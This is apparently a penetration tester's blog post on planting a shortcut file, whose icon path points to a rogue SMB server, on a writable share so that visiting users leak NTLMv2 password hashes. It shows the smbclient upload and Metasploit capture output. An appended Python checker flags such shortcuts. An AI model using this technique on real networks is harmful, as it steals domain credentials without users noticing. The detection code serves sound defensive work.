You down with LNK?

Oftentimes on an Internal pen test, I find myself with a limited-privilege domain user account. On a recent test, I got ahold of an account like this through various means of hackery. It didn't have local admin anywhere, it wasn't a member of any IT groups; it was just a super low privilege user from the Marketing department. The only real privilege it had was write access to the Marketing share. In a quest to gather more user accounts, I decided to abuse my write access to the share and drop a backdoored shortcut file.

The idea here is that we can create a random shortcut file that goes nowhere, but pulls its icon image from a remote share. When a domain user visits the marketing share with the malicious LNK file in it, Windows tries to load up all the pretty icons for the files on the share. In our case, Windows tries to grab the icon for our malicious LNK file, sees that it's on another share, and attempts to auth to the remote share to get the icon file. That remote share just so happens to be our rogue SMB server (running static challenges for Rainbow Tables goodness, of course).

Let's get to work.
Fire up a Windows machine, create a throwaway shortcut file, and edit its properties so that it pulls its icon image from a local network share. Then use a hex editor to swap the IP and share name in the icon path so that they point at our SMB listener.


Now, let's drop this file on our Marketing share:

```
# smbclient -U BANANASTAND/user%pass //10.0.0.5/marketing/
Domain=[BANANASTAND] OS=[EMC-PEEL] Server=[COLDSTORAGE1]
smb: \> put trustwave.lnk
putting file trustwave.lnk as \trustwave.lnk (58.0 kb/s) (average 58.0 kb/s)
smb: \> dir
  .                                   D        0  Wed Mar 28 14:07:44 2012
  Thumbs.db                          HS    94208  Tue Mar  6 09:56:01 2012
  Sales Folder                        D        0  Thu Mar  8 11:36:10 2012
  SCANNED CONTRACTS.lnk                      210  Mon Feb 13 12:52:04 2012
  Shortcut to Sales Folder.lnk               279  Fri Oct 21 09:15:08 2011
  Client folder                       D        0  Tue Mar 20 15:49:35 2012
  trustwave.lnk                        A      475  Wed Mar 28 14:07:44 2012
  Sales Folder - Shortcut.lnk                635  Tue Mar  6 09:55:09 2012

                56721 blocks of size 8388608. 12215 blocks available
```

Great! When anyone visits the marketing share, all they will see is an inconspicuous shortcut file.


By the time they see it, their goose has already been cooked (er...hacked?). Their workstation has already gone hunting for the icon file located on our rogue SMB share:

```
msf  auxiliary(smb) >
[*] SMB Captured - 2012-12-10 12:32:00 -0500
NTLMv2 Response Captured from 10.0.0.104:49240 - 10.0.0.104
USER:pc903423 DOMAIN:BANANASTAND OS: LM:
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
NTHASH:5630qw4fwer7013acf5665bre2d2weab8 NT_CLIENT_CHALLENGE:0101000000000000sdfh22353yk2356jl450239r7ebwe093ew00000000020000000000000000000000
```

That's it. By simply tricking a user into browsing a share, we can grab their password hash and start crackin' (or smb_relay them, if you are feeling lucky). What's nice about this attack is that it isn't limited to your local broadcast net the way ARP spoofing or any of the NBNS / LLMNR trickery is. It's also pretty stealthy: there are no pop-up boxes or error messages. Windows tries to auth to the SMB server, fails to get the icon file, and just moves on. This gives you the opportunity to quietly collect password hashes from several other users and propagate throughout the network nicely. Mmmmm, hashes.
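The other side of this trick is spotting it. As an added example that is not part of the original post, here is a small defender-side check: a parser for the StringData section of the .lnk format (layout and LinkFlags bits from the public MS-SHLLINK specification) that pulls the ICON_LOCATION string out of shortcuts found on a share and flags any whose icon would be fetched from a UNC host outside an allow-list. The two sample shortcuts, the `10.0.0.99` host and the function names are constructed for this example and do not come from the post.

```python
import re
import struct

# Field layout and LinkFlags bits from MS-SHLLINK (the .lnk specification).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields appear in this fixed order, each gated by its LinkFlags bit.
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]

def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields present in a .lnk file, icon_location included."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C                              # ShellLinkHeader is always 76 bytes
    if flags & HAS_ID_LIST:                 # IDListSize (2 bytes) then the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:               # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1  # UTF-16LE vs ANSI, no terminator
    out = {}
    for bit, key in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            out[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count * width
    return out

def remote_icon_host(data: bytes):
    """Host named by a UNC icon path (\\\\host\\share\\...), or None if the icon is local."""
    icon = parse_lnk_strings(data).get("icon_location", "")
    m = re.match(r"^\\\\([^\\]+)\\", icon)
    return m.group(1) if m else None

def flag_shortcut(data: bytes, allowed_hosts=()) -> bool:
    """True when the icon would be fetched from a host outside the allow-list."""
    host = remote_icon_host(data)
    return host is not None and host.lower() not in {h.lower() for h in allowed_hosts}

# Constructed test fixtures: a 76-byte header with only HasIconLocation (0x40) set,
# ANSI strings, followed by a single ICON_LOCATION string (count + bytes).
_HDR = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, 0x40, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
_REMOTE = b"\\\\10.0.0.99\\share\\icon.ico"       # constructed, not a real host
_LOCAL = b"C:\\Windows\\System32\\shell32.dll"
SAMPLE_REMOTE = _HDR + struct.pack("<H", len(_REMOTE)) + _REMOTE
SAMPLE_LOCAL = _HDR + struct.pack("<H", len(_LOCAL)) + _LOCAL
```

Run `flag_shortcut` over every `.lnk` on a writable share and alert on hits; a shortcut whose icon lives on a host that is not a known file server is exactly the artifact this post plants.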
